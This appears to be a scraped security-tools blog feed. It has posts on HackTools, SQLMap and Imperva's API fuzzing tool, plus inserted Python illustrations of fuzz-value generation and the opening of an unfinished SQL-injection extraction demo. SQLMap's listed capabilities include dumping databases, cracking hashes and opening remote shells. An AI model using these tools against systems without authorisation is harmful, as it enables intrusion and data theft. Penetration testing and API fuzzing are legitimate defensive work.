<a href="https://1.bp.blogspot.com/-6pnw8d7KwLo/XzoTUh64JjI/AAAAAAAATj0/zpRwue8gFCUQoAuPA2eOKlYLC9xydzENQCNcBGAsYHQ/s1600/Hack-Tools_9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1201" data-original-width="1600" height="480" src="https://1.bp.blogspot.com/-6pnw8d7KwLo/XzoTUh64JjI/AAAAAAAATj0/zpRwue8gFCUQoAuPA2eOKlYLC9xydzENQCNcBGAsYHQ/s640/Hack-Tools_9.png" width="640" /></a></div>
</div>
<span style="font-size: large;"><b>Install the application</b></span><br />
<br />
<b>Chromium based browser</b><br />
All the available releases are <a href="https://github.com/LasCC/Hack-Tools/releases" rel="nofollow" target="_blank" title="here.">here</a>.<br />
Otherwise, if you want to build the project yourself from the source code, see "Build from source code" below.<br />
<br />
<b>Mozilla Firefox</b><br />
You can download <strong>HackTools</strong> on the Firefox browser <a href="https://www.kitploit.com/search/label/Add-ons" target="_blank" title="add-ons">add-ons</a> <a href="https://addons.mozilla.org/en-US/firefox/addon/hacktools/" rel="nofollow" target="_blank" title="here.">here.</a><br />
<br />
<span style="font-size: large;"><b>Build from source code</b></span><br />
<div>
<pre><code>yarn install && yarn build</code></pre>
</div>
Once the build is done correctly, webpack will create a new folder called <strong>dist</strong><br />
After that you need to go to the <strong>extensions</strong> tab of your Chromium-based browser and turn on <strong>developer mode</strong><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-wNG9pZ5VTzg/XzoTilI5psI/AAAAAAAATkA/UCUttWK_2rE0xKPlZ41oXsleOH8Eq0NnACNcBGAsYHQ/s1600/Hack-Tools_10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="130" data-original-width="287" src="https://1.bp.blogspot.com/-wNG9pZ5VTzg/XzoTilI5psI/AAAAAAAATkA/UCUttWK_2rE0xKPlZ41oXsleOH8Eq0NnACNcBGAsYHQ/s1600/Hack-Tools_10.png" /></a></div>
<br />
Then click on the <strong>load unpacked</strong> button in the top left corner<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-gHMtkLyI80Y/XzoTlwGPjtI/AAAAAAAATkM/CvqR6fgKgDwY7biC5Z705XeSa4QK9s7IACNcBGAsYHQ/s1600/Hack-Tools_11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="126" data-original-width="563" src="https://1.bp.blogspot.com/-gHMtkLyI80Y/XzoTlwGPjtI/AAAAAAAATkM/CvqR6fgKgDwY7biC5Z705XeSa4QK9s7IACNcBGAsYHQ/s1600/Hack-Tools_11.png" /></a></div>
<br />
Once you have clicked the button you just need to select the <strong>dist folder</strong> and that's it!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-DcimhgAHTKk/XzoTpgm1qMI/AAAAAAAATkQ/-bnwcEMisHU1_EVYfVlluLnSYlvjKFG7gCNcBGAsYHQ/s1600/Hack-Tools_12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="455" data-original-width="802" height="363" src="https://1.bp.blogspot.com/-DcimhgAHTKk/XzoTpgm1qMI/AAAAAAAATkQ/-bnwcEMisHU1_EVYfVlluLnSYlvjKFG7gCNcBGAsYHQ/s640/Hack-Tools_12.png" width="640" /></a></div>
<br />
<span style="font-size: large;"><b>Authors</b></span><br />
<strong>Ludovic COULON & Riadh BOUCHAHOUA</strong><br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/LasCC/Hack-Tools" rel="nofollow" target="_blank" title="Download Hack-Tools">Download Hack-Tools</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-5363132670232250562020-01-01T17:17:00.000-03:002020-01-01T17:17:00.269-03:00SQLMap v1.4 - Automatic SQL Injection And Database Takeover Tool<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-kC0tV4bFZBE/Xgz3ynvucXI/AAAAAAAARVs/dV8i8SzFUPUWL-WbDbYVVWoRUrsHoAp2QCNcBGAsYHQ/s1600/sqlmap_1.4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="657" data-original-width="697" height="602" src="https://1.bp.blogspot.com/-kC0tV4bFZBE/Xgz3ynvucXI/AAAAAAAARVs/dV8i8SzFUPUWL-WbDbYVVWoRUrsHoAp2QCNcBGAsYHQ/s640/sqlmap_1.4.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: justify;">
<b>SQLMap</b> is an open source <a href="http://www.kitploit.com/search/label/Penetration%20Testing%20Tool">penetration testing tool</a> that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful <a href="http://www.kitploit.com/search/label/Detection">detection</a> engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, through data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.</div>
<a name='more'></a><br />
<div style="text-align: justify;">
<b><span style="font-size: large;">Features</span></b></div>
<ul>
<li style="text-align: justify;">Full support for <strong>MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix</strong> database management systems.</li>
<li style="text-align: justify;">Full support for six SQL injection techniques: <strong>boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band</strong>.</li>
<li style="text-align: justify;">Support to <strong>directly connect to the database</strong> without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.</li>
<li style="text-align: justify;">Support to enumerate <strong>users, password hashes, privileges, roles, databases, tables and columns</strong>.</li>
<li style="text-align: justify;">Automatic recognition of password hash formats and support for <strong>cracking them using a dictionary-based attack</strong>.</li>
<li style="text-align: justify;">Support to <strong>dump database tables</strong> entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.</li>
<li style="text-align: justify;">Support to <strong>search for specific database names, specific tables across all databases or specific columns across all databases' tables</strong>. This is useful, for instance, to identify tables containing custom application credentials where the relevant column names contain strings like name and pass.</li>
<li style="text-align: justify;">Support to <strong>download and upload any file</strong> from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>execute arbitrary commands and retrieve their standard output</strong> on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>establish an out-of-band stateful TCP connection between the attacker machine and the database server</strong> underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.</li>
<li style="text-align: justify;">Support for <strong>database process' user privilege escalation</strong> via Metasploit's Meterpreter <code>getsystem</code> command.</li>
</ul>
<br />
<span style="font-size: large;"><b>Installation</b></span><br />
You can download the latest tarball by clicking <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">here</a> or latest zipball by clicking <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">here</a>.<br />
Preferably, you can download sqlmap by cloning the <a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Git</a> repository:<br />
<pre><code>git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev</code></pre>
sqlmap works out of the box with <a href="http://www.python.org/download/" rel="nofollow" target="_blank">Python</a> version <strong>2.6.x</strong> and <strong>2.7.x</strong> on any platform.<br />
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
To get a list of basic options and switches use:<br />
<pre><code>python sqlmap.py -h</code></pre>
To get a list of all options and switches use:<br />
<pre><code>python sqlmap.py -hh</code></pre>
You can find a sample run <a href="https://asciinema.org/a/46601" rel="nofollow" target="_blank">here</a>. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the <a href="https://github.com/sqlmapproject/sqlmap/wiki/Usage" rel="nofollow" target="_blank">user's manual</a>.<br />
<br />
<span style="font-size: large;"><b>Links</b></span><br />
<ul>
<li>Homepage: <a href="http://sqlmap.org/" rel="nofollow" target="_blank">http://sqlmap.org</a></li>
<li>Download: <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">.tar.gz</a> or <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">.zip</a></li>
<li>Commits RSS feed: <a href="https://github.com/sqlmapproject/sqlmap/commits/master.atom" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/commits/master.atom</a></li>
<li>Issue tracker: <a href="https://github.com/sqlmapproject/sqlmap/issues" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/issues</a></li>
<li>User's manual: <a href="https://github.com/sqlmapproject/sqlmap/wiki" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki</a></li>
<li>Frequently Asked Questions (FAQ): <a href="https://github.com/sqlmapproject/sqlmap/wiki/FAQ" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/FAQ</a></li>
<li>Twitter: <a href="https://twitter.com/sqlmap" rel="nofollow" target="_blank">@sqlmap</a></li>
<li>Demos: <a href="http://www.youtube.com/user/inquisb/videos" rel="nofollow" target="_blank">http://www.youtube.com/user/inquisb/videos</a></li>
<li>Screenshots: <a href="https://github.com/sqlmapproject/sqlmap/wiki/Screenshots" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/Screenshots</a></li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Download SQLMap v1.4</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-15472594231610881272019-12-19T17:30:00.000-03:002019-12-19T17:30:13.026-03:00Automatic API Attack Tool - Customizable API Attack Tool Takes An API Specification As An Input, Generates And Runs Attacks That Are Based On It As An Output<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-9iVNr9x-Z7U/XfmLw46gfLI/AAAAAAAARIw/wNS1genvno0KvL0CwRh1MK5jvCHmDYPEgCNcBGAsYHQ/s1600/Automatic%2BAPI%2BAttack%2BTool.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="328" data-original-width="507" height="414" src="https://1.bp.blogspot.com/-9iVNr9x-Z7U/XfmLw46gfLI/AAAAAAAARIw/wNS1genvno0KvL0CwRh1MK5jvCHmDYPEgCNcBGAsYHQ/s640/Automatic%2BAPI%2BAttack%2BTool.png" width="640" /></a></div>
<br />
Imperva's customizable API attack tool takes an API specification as an input, and generates and runs attacks that are based on it as an output.<br />
The tool parses an API specification and builds fuzzing scenarios from what the specification defines. Every endpoint is exercised with generated values, both inside the boundaries the specification sets and outside them; the resulting requests are sent and each one's success or failure is reported in detail. The tool can also be extended to run security attack vectors such as illegal resource access, XSS, SQLi and RFI against the defined endpoints, or even against non-existent ones. <strong>No human intervention is needed. Simply run the tool and get the results.</strong><br />
The tool is easy to extend to different needs, such as a developer who wants to test their own API, or an organization that wants to run regular <a href="https://www.kitploit.com/search/label/Vulnerability" target="_blank" title="vulnerability">vulnerability</a> or positive security scans against its public API. It is built with CI/CD in mind.<br />
<a name='more'></a><br />
<span style="font-size: large;"><b>Requirements</b></span><br />
<ul>
<li>Java 8 or higher</li>
<li>Gradle</li>
</ul>
<br />
<span style="font-size: large;"><b>Running</b></span><br />
<ul>
<li>Check out the code from GitHub and run 'gradle build'</li>
<li>You may find the executable jar under the build/libs folder</li>
<li>Run 'java -jar imperva-api-attack-tool.jar' to see the help menu</li>
</ul>
<br />
<span style="font-size: large;"><b>Making a Linux executable</b></span><br />
<ul>
<li>Copy the runnable.sh file from the src/main/resources folder, to the same directory with the jar file.</li>
<li>Now run: 'cat runnable.sh imperva-api-attack-tool.jar > api-attack.sh && chmod +x api-attack.sh'</li>
<li>You may use the api-attack.sh file as a regular executable</li>
</ul>
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
<br />
<b>Required parameters:</b><br />
-f, --specFile=<em>specFilePath</em><br />
<blockquote>
The API specification file (swagger 2.0) to run on. JSON/YAML format. For better results, make sure responses are well defined for each endpoint.</blockquote>
-n, --hostName=<em>hostName</em><br />
<blockquote>
The host name to connect to. It can also be an IP</blockquote>
-s, --hostScheme=<em>hostScheme</em><br />
<blockquote>
Connection to host will be made using this scheme; e.g: https or http</blockquote>
<br />
<b>Optional parameters:</b><br />
-p, --hostPort=<em>hostPort</em><br />
<blockquote>
The port the host is listening on for API calls, default is: 443</blockquote>
-ph, --proxyHost=<em>proxyHost</em><br />
<blockquote>
Specify the proxy host to send the requests via a proxy</blockquote>
-pp, --proxyPort=<em>proxyPort</em><br />
<blockquote>
The proxy port, default is: 80</blockquote>
-rcn, --addNegativeRC=<em>responseCode[,responseCode...]</em><br />
<blockquote>
Additional response codes to be accepted in negative attacks (e.g. bad value attacks). Multiple values are supported, separated by commas</blockquote>
-rcp, --addPositiveRC=<em>responseCode[,responseCode...]</em><br />
<blockquote>
Additional response codes to be accepted in positive checks (legitimate value attacks). Multiple values are supported, separated by commas</blockquote>
<br />
<br />
<b>Typical usage scenarios:</b><br />
<ul>
<li> You'd like to check whether your API is protected by an API Security solution.<br />
Example run: <code>api-attack.sh -f swaggerPetStore.json -n myapisite.com -s http -rcn=403</code><br />
We've added the <code>403</code> response code as a legitimate response for the negative checks, because an API Security solution blocks such requests and answers with a 403, whereas the spec does not necessarily declare a 403 response for any of its endpoints. The override makes those responses legitimate even though they are absent from the spec, and the tool alerts you whenever a negative check does not receive one: such a case means the request got through and you are left unprotected by your API security solution.<br />
</li>
<li> You'd like to check how your proxy mitigates API attacks, but don't have an actual site behind it.<br />
Example run: <code>api-attack.sh -f swaggerPetStore.json -n myapisite.com -s http -ph 127.0.0.1 -pp=4010 -rcn=403 -rcp=404</code><br />
This time we've also added the <code>404</code> status code to the positive scenarios, so that when a scenario is not blocked we do not report a failure but accept the legitimate <code>404</code> (resource not found) response.<br />
</li>
<li> You'd like to check whether your API handles all inputs correctly. Furthermore, you'd like to run it on a nightly basis, or even after each time a developer pushes new code to the project.<br />
Example run: <code>api-attack.sh -f myapi_swagger.yaml -n staging.myorg.com -s https</code><br />
This time we're running without any exclusions, so the API specification file must declare its response codes precisely: the tool accepts only those as legitimate and fails the checks otherwise (see the conditions for failing checks below). Run the above command in a Jenkins job (or any other CI/CD software to your liking), triggered by a cron or by a push to the repository. Make sure you have the <code>TestNG</code> plugin installed, so that it parses the results written to <code>build/testng-results</code> and gives you better <a href="https://www.kitploit.com/search/label/Visibility" target="_blank" title="visibility">visibility</a> in the CI/CD scenario.<br />
</li>
<li> You'd like to check whether this API might be open to fuzzing attempts. Simply run the tool and check the reported failures.<br />
Example run: <code>api-attack.sh -f publiclyAvailableSwaggerOfAPI.yaml -n api.corporate.com -s https</code><br />
</li>
<li> You'd like to check whether your API is implemented correctly on the server side, or that its definition matches the server implementation.<br />
Example run: <code>api-attack.sh -f publiclyAvailableSwaggerOfAPI.yaml -n api.corporate.com -s https</code><br />
</li>
</ul>
<br />
<b>Conditions for failing checks</b><br />
<ul>
<li>The tool verifies that the response code of each generated request matches one of the response codes declared in the swagger. Two rules override that plain comparison:</li>
<li>Positive checks: a 5xx response is a clear error and fails the check whether or not the spec declares that code, unless you accepted the code with an override (<code>-rcp</code>).</li>
<li>Negative checks: a response that is not a legitimate error (1xx, 2xx or 5xx) fails the check unless you supplied an override (<code>-rcn</code>). A legitimate error code that is not declared in the spec fails the check as well.</li>
<li>You may use the 'default' definition in the response section of the swagger, but this is not recommended. Always define your legitimate answers precisely.</li>
</ul>
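The rules above as an added worked example in Python (an illustration written for this page, not the attack tool's own Java code). The Swagger fragment is constructed for the example; the rule ordering (override first, then the 5xx / non-error class rule, then the declared-code comparison) and the skipping of a <code>default</code> response entry are my reading of the README's prose, and the status codes come from the usage scenarios and the failed and successful checks shown on this page.<br />

```python
"""Verdict rules for positive and negative API checks (added illustration)."""
from __future__ import annotations

# Constructed Swagger 2.0 fragment (Petstore-style): only the responses sections matter here.
SPEC = {
    "paths": {
        "/user/{username}": {"get": {"responses": {"200": {}, "400": {}, "404": {}}}},
        "/store/order": {"post": {"responses": {"200": {}, "400": {}}}},
    }
}


def declared_codes(spec: dict, path: str, method: str) -> set[int]:
    """Numeric response codes the spec declares for one endpoint (URL, method).

    Assumption: a 'default' entry is ignored, since the README tells you to
    declare legitimate answers precisely instead of relying on it.
    """
    responses = spec["paths"][path][method.lower()]["responses"]
    return {int(code) for code in responses if code.isdigit()}


def verdict(kind: str, status: int, declared: set[int],
            overrides: frozenset[int] = frozenset()) -> bool:
    """True when a check passes.

    kind      'positive' (legitimate values) or 'negative' (bad values)
    overrides extra accepted codes, i.e. -rcp for positive and -rcn for negative checks
    """
    if status in overrides:              # an explicit override always wins
        return True
    klass = status // 100
    if kind == "positive":
        if klass == 5:                   # clear server error: fails even if declared
            return False
        return status in declared
    if kind == "negative":
        if klass in (1, 2, 5):           # bad input was not rejected cleanly
            return False
        return status in declared        # the rejection code must still be in the spec
    raise ValueError(f"unknown check kind {kind!r}")


def page_examples() -> dict[str, bool]:
    """The checks and usage scenarios from this page, run through the rules."""
    user_get = declared_codes(SPEC, "/user/{username}", "GET")
    order_post = declared_codes(SPEC, "/store/order", "POST")
    return {
        # negative check: GET /user/{ answered 200 instead of being rejected
        "bad_username_200": verdict("negative", 200, user_get),
        # negative check: POST /store/order with a double for an integer, answered 200
        "bad_quantity_200": verdict("negative", 200, order_post),
        # positive check: nonexistent but legal username answered with a declared 404
        "unknown_user_404": verdict("positive", 404, user_get),
        # WAF scenario: 403 is undeclared, so it only passes with -rcn=403
        "waf_403_with_override": verdict("negative", 403, user_get, frozenset({403})),
        "waf_403_without_override": verdict("negative", 403, user_get),
        # proxy-without-backend scenario: 404 on a positive check, accepted via -rcp=404
        "proxy_404_positive": verdict("positive", 404, order_post, frozenset({404})),
    }
```

The override sets map directly onto the <code>-rcp</code> and <code>-rcn</code> switches: keep them per check kind, because a 403 that is fine for a bad-value request is not an acceptable answer to a legitimate one.<br />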
<br />
<span style="font-size: large;"><b>Expected outputs:</b></span><br />
<ul>
<li>The tool uses the testng <a href="https://www.kitploit.com/search/label/Reporting" target="_blank" title="reporting">reporting</a> framework, so any plugin that handles testng runs can be used here. Only note that the results are written under the build/testng-results folder. This can be changed, of course.</li>
<li>The tool generates requests according to its check suites, and each request checks something specific. So each check will present all the relevant details in the <a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="command line">command line</a> output, together with what is being checked, what the response is, and whether or not it was as expected.</li>
<li>Any bad requests are stored in the <code>bad_requests</code> folder, so that you can analyze them later (for instance when the tool runs on a CI/CD server you don't have immediate access to)</li>
<li>In the end, you will be provided with a summary</li>
</ul>
<br />
<b>Example of a negative check that failed:</b><br />
<pre><code>***** Testing API Endpoint *****
***** Test ID: 1575128763286-74212
Testing: Bad Property: /username (STRING), value: {, URL encoded: %7B
--> Url: /user/{
--> Method: GET
--> Headers: []
----------**----------
Request was: GET /user/{ [Accept: application/json], Response status code: 200(UNEXPECTED)
Response (non parsed):
{"id":0,"username":"string","firstName":"string","lastName":"string","email":"string","password":"string","phone":"string","userStatus":0}</code></pre>
Why did the check fail? The request got a 200 even though it did not contain a legal URL.<br />
<br />
<b>Another example:</b><br />
<pre><code>***** Testing API Endpoint *****
***** Test ID: 1575128763286-25078
Testing: Bad Property: /body/quantity (INTEGER), value: 0.4188493, URL encoded: 0.4188493
--> Url: /store/order
--> Method: POST
--> Headers: []
--> Body: {"petId":-2511515111206893939,"quantity":0.4188493,"id":698757161286106823,"shipDate":"�s","complete":"true","status":"approved"}
----------**----------
Request was: POST /store/order [Accept: application/json], Response status code: 200(UNEXPECTED)
Response (non parsed):
{"id":0,"petId":0,"quantity":0,"shipDate":"2019-11-30T15:46:03Z","status":"placed","complete":false}</code></pre>
The server expected an integer but accepted a double, so the value is not validated against its declared type. That makes this field a good spot to probe for deeper bugs, such as a <a href="https://www.kitploit.com/search/label/Buffer%20Overflow" target="_blank" title="buffer overflow">buffer overflow</a> in the server's handling of the value.<br />
<br />
<b>Example of a successful check:</b><br />
<pre><code>***** Testing API Endpoint *****
***** Test ID: 1575128763137-43035
Testing: /user/{username}
--> Url: /user/%E68E97EDB4Oq-(!BbG,Y$p'A-KW%65f9FA6jt5vvDz-cW.QGsLS+AA~RIHC3wgy25lDJsGzcT.;kJ+(
--> Method: GET
--> Headers: []
----------**----------
Request was: GET /user/%E68E97EDB4Oq-(!BbG,Y$p'A-KW%65f9FA6jt5vvDz-cW.QGsLS+AA~RIHC3wgy25lDJsGzcT.;kJ+( [Accept: application/json], Response status code: 404
Response (non parsed):
{"statusCode":404,"error":"Not Found","message":"Not Found"}</code></pre>
We supplied a username that was nonexistent but legal, according to the API specification. The server knew how to handle this request and return a legal error.<br />
<br />
<span style="font-size: large;"><b>Supported Check Scenarios</b></span><br />
Here the term <code>endpoint</code> means the tuple of endpoint URL and HTTP method.<br />
<br />
<b>Positive Scenarios</b><br />
<ul>
<li>For each endpoint, creates a request with generated values for all of its parameters. These are generated randomly, but obey the rules that are defined in the API specification.</li>
<li>For each endpoint, creates a request with only the required parameters, with values generated as described above.</li>
</ul>
<br />
<b>Negative Scenarios</b><br />
<ul>
<li>For each endpoint, creates multiple requests, each of which checks a different parameter. The tool injects a random bad input value into the checked parameter and fills the rest with "positive" values generated in the same manner as in the positive scenarios.</li>
</ul>
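An added Python example of how the positive and negative scenarios above can be generated from Swagger 2.0 parameter definitions (an illustration written for this page, not the tool's own code). The parameter list is constructed; the particular bad values (a double for an integer, an out-of-range number, an over-long string or one containing a brace or NUL, a value outside an enum) are assumptions modelled on the failed checks shown earlier, and <code>conforms()</code> is a helper added here to verify what the generators produce.<br />

```python
"""Positive and negative value generation for Swagger 2.0 parameters (added illustration)."""
import random
import string

# Constructed parameter definitions in Swagger 2.0 style (name, in, required, type, constraints).
PARAMS = [
    {"name": "username", "in": "path", "required": True, "type": "string",
     "minLength": 1, "maxLength": 20},
    {"name": "quantity", "in": "body", "required": True, "type": "integer",
     "minimum": 1, "maximum": 100},
    {"name": "status", "in": "query", "required": False, "type": "string",
     "enum": ["placed", "approved", "delivered"]},
    {"name": "complete", "in": "query", "required": False, "type": "boolean"},
]

_SAFE_CHARS = string.ascii_letters + string.digits


def valid_value(param, rng):
    """A random value that obeys every constraint the parameter declares."""
    t = param["type"]
    if "enum" in param:
        return rng.choice(param["enum"])
    if t == "integer":
        return rng.randint(param.get("minimum", 0), param.get("maximum", 1000))
    if t == "number":
        return rng.uniform(param.get("minimum", 0.0), param.get("maximum", 1000.0))
    if t == "boolean":
        return rng.choice([True, False])
    if t == "string":
        n = rng.randint(param.get("minLength", 1), param.get("maxLength", 32))
        return "".join(rng.choice(_SAFE_CHARS) for _ in range(n))
    raise ValueError(f"unsupported type {t!r}")


def bad_value(param, rng):
    """A random value that violates the parameter's type or one of its constraints."""
    t = param["type"]
    if "enum" in param:
        return "not-in-enum"
    if t == "integer":
        return rng.choice([rng.random(),                        # wrong type: a double
                           param.get("maximum", 1000) + 1,       # above the declared range
                           param.get("minimum", 0) - 1])         # below the declared range
    if t == "number":
        return "not-a-number"                                    # wrong type
    if t == "boolean":
        return "maybe"
    if t == "string":
        return rng.choice(["{", "}", "\x00",                     # URL-illegal characters
                           "A" * (param.get("maxLength", 32) + 1)])  # too long
    raise ValueError(f"unsupported type {t!r}")


def conforms(param, value):
    """True if value satisfies the parameter definition (checks what the generators produce)."""
    t = param["type"]
    if "enum" in param:
        return value in param["enum"]
    if t == "integer":
        return (type(value) is int
                and param.get("minimum", float("-inf")) <= value <= param.get("maximum", float("inf")))
    if t == "number":
        return isinstance(value, (int, float)) and not isinstance(value, bool)
    if t == "boolean":
        return isinstance(value, bool)
    if t == "string":
        return (isinstance(value, str)
                and param.get("minLength", 0) <= len(value) <= param.get("maxLength", 10**9)
                and all(c in _SAFE_CHARS for c in value))
    return False


def positive_requests(params, rng):
    """The two positive scenarios: all parameters filled, then only the required ones."""
    full = {p["name"]: valid_value(p, rng) for p in params}
    required_only = {p["name"]: valid_value(p, rng) for p in params if p["required"]}
    return [full, required_only]


def negative_requests(params, rng):
    """One request per parameter: that parameter gets a bad value, all others valid ones."""
    scenarios = []
    for target in params:
        request = {p["name"]: valid_value(p, rng) for p in params}
        request[target["name"]] = bad_value(target, rng)
        scenarios.append((target["name"], request))
    return scenarios


def demo(seed=7):
    """Deterministic run over the constructed parameters: {'positive': [...], 'negative': [...]}."""
    rng = random.Random(seed)
    return {"positive": positive_requests(PARAMS, rng), "negative": negative_requests(PARAMS, rng)}
```

Seeding the generator is what makes a nightly CI run reproducible: a failure such as the <code>quantity=0.4188493</code> case above can be replayed with the same seed instead of hoping the random draw recurs.<br />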
<br />
<b>Ongoing Effort</b><br />
We are working on migrating our other scenarios to the open-source tool, for the benefit of the community. Stay tuned for updates.<br />
<br />
<span style="font-size: large;"><b>Extensibility</b></span><br />
The tool is written in a way that makes it easy to extend its fuzzing and request generation functionality to meet your specific needs. Feel free to suggest any additions that others may benefit from by creating a pull request.<br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/imperva/automatic-api-attack-tool" rel="nofollow" target="_blank" title="Download Automatic-Api-Attack-Tool">Download Automatic-Api-Attack-Tool</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-16636331430212841992019-10-03T09:00:00.000-03:002019-10-03T09:00:05.157-03:00SQLMap v1.3.10 - Automatic SQL Injection And Database Takeover Tool<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-brUPrgcig0Y/XZVT58OABfI/AAAAAAAAQhI/7pL6-4mgzUwDKRdtVJy0r0WoIxIr1DCOACNcBGAsYHQ/s1600/sqlmap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="568" data-original-width="602" src="https://1.bp.blogspot.com/-brUPrgcig0Y/XZVT58OABfI/AAAAAAAAQhI/7pL6-4mgzUwDKRdtVJy0r0WoIxIr1DCOACNcBGAsYHQ/s1600/sqlmap.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: justify;">
<b>SQLMap</b> is an open source <a href="http://www.kitploit.com/search/label/Penetration%20Testing%20Tool">penetration testing tool</a> that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful <a href="http://www.kitploit.com/search/label/Detection">detection</a> engine, many niche features for the ultimate penetration tester and a broad range of switches, ranging from database fingerprinting, through fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.</div>
<a name='more'></a><br />
<div style="text-align: justify;">
<b><span style="font-size: large;">Features</span></b></div>
<ul>
<li style="text-align: justify;">Full support for <strong>MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix</strong> database management systems.</li>
<li style="text-align: justify;">Full support for six SQL injection techniques: <strong>boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band</strong>.</li>
<li style="text-align: justify;">Support to <strong>directly connect to the database</strong> without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.</li>
<li style="text-align: justify;">Support to enumerate <strong>users, password hashes, privileges, roles, databases, tables and columns</strong>.</li>
<li style="text-align: justify;">Automatic recognition of password hash formats and support for <strong>cracking them using a dictionary-based attack</strong>.</li>
<li style="text-align: justify;">Support to <strong>dump database tables</strong> entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.</li>
<li style="text-align: justify;">Support to <strong>search for specific database names, specific tables across all databases or specific columns across all databases' tables</strong>. This is useful, for instance, to identify tables containing custom application credentials where the relevant column names contain strings like name and pass.</li>
<li style="text-align: justify;">Support to <strong>download and upload any file</strong> from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>execute arbitrary commands and retrieve their standard output</strong> on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>establish an out-of-band stateful TCP connection between the attacker machine and the database server</strong> underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.</li>
<li style="text-align: justify;">Support for <strong>database process' user privilege escalation</strong> via Metasploit's Meterpreter <code>getsystem</code> command.</li>
</ul>
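The class of flaw sqlmap detects and exploits, shown as an added Python example written for this page (not sqlmap's code): a query that pastes its input into the SQL text beside the parameterized form that does not, and a boolean-based blind extraction loop of the kind the second feature above automates. The SQLite database and its users rows are constructed for the example; the inference uses SQLite's <code>length()</code>, <code>substr()</code> and <code>unicode()</code> because that is the engine in the example, whereas sqlmap picks the equivalent functions for the DBMS it fingerprints.<br />

```python
"""SQL injection, its parameterized fix, and boolean-based blind extraction (added illustration)."""
import sqlite3


def build_db() -> sqlite3.Connection:
    """In-memory SQLite database with a constructed users table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT)")
    con.executemany("INSERT INTO users (name, pw_hash) VALUES (?, ?)",
                    [("admin", "5f4dcc3b5aa765d61d8327deb882cf99"),   # constructed rows
                     ("bob", "deadbeefdeadbeefdeadbeefdeadbeef")])
    con.commit()
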